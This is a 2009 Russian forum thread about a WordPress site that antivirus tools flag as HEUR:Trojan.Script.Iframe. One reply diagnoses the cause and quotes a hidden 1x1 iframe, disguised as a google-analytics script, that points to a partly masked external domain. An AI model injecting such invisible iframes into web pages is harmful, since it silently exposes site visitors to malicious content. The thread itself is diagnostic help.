kylibin Опубликовано 7 июля, 2009 Share Опубликовано 7 июля, 2009 _http://www.studlife.isgreat.org/ У меня стоит NOD32 (30669) при загрузке сайта молчит и все люкс грузится, у всех у кого Касперский, AVG матюкается и выдает сабж: HEUR:Trojan.Script.Iframe комп 100 перепроверял и касперским и НОДом все чисто...проблема на сервере? На сервер залито токо WordPress и тема сайта, взяты из солидного источника, где все файлы давно проверены на вирусы.. +++++++++++ - скачивал файлы на комп, проверял - троянов нет. -проверил комп... троянов нет. Чё делать? посетители жалуються, рейтинг падает, а проблема вижу глобальная, не токо у меня и она пока остается...нужно универсальное решение. Сообщение от модератора Falcon Сообщения выделены из данной темы. Ссылка на комментарий Поделиться на другие сайты More sharing options...
dan-1 Опубликовано 7 июля, 2009 Share Опубликовано 7 июля, 2009 _http://www.studlife.isgreat.org/ У меня стоит NOD32 (30669) при загрузке сайта молчит и все люкс грузится, у всех у кого Касперский, AVG матюкается и выдает сабж: HEUR:Trojan.Script.Iframe комп 100 перепроверял и касперским и НОДом все чисто...проблема на сервере? На сервер залито токо WordPress и тема сайта, взяты из солидного источника, где все файлы давно проверены на вирусы.. +++++++++++ - скачивал файлы на комп, проверял - троянов нет. -проверил комп... троянов нет. Чё делать? посетители жалуються, рейтинг падает, а проблема вижу глобальная, не токо у меня и она пока остается...нужно универсальное решение. Это вам в новый топик Ссылка на комментарий Поделиться на другие сайты More sharing options...
akoK Опубликовано 7 июля, 2009 Share Опубликовано 7 июля, 2009 (изменено) kylibin, я не удивлен. Там под маской скрипта google-analytics.com сидит ифрейм <iframe src="http://clicks ххх .ru/top100/iframe .php" width=1 height=1 style="visibility: hidden"></iframe> Изменено 7 июля, 2009 пользователем akoK Ссылка на комментарий Поделиться на другие сайты More sharing options...
Тётя Евдокия Опубликовано 18 июля, 2009 Share Опубликовано 18 июля, 2009 Можно я в этой теме попрошу помощи.Весь мой Касперский закраснел.И не знаю как его позеленить. Проводила полную проверку компа и раскопал КАВ этот ифрейм и плюс еще какой-то генерик. Что делать только мне как большому чайнику по порядку,если можно.Пожалуйста! Ссылка на комментарий Поделиться на другие сайты More sharing options...
Тётя Евдокия Опубликовано 20 июля, 2009 Share Опубликовано 20 июля, 2009 Вобщем отсюда ухожу в свою тему. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Marcos Опубликовано 7 января, 2010 Share Опубликовано 7 января, 2010 Насколько знаю я, то если в начале стоит HEUR - это только подозрение на вирус! Сообщение от модератора ТроПа Будте внимательнее, пожалуйста, смотрите на даты предыдущих сообщений. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти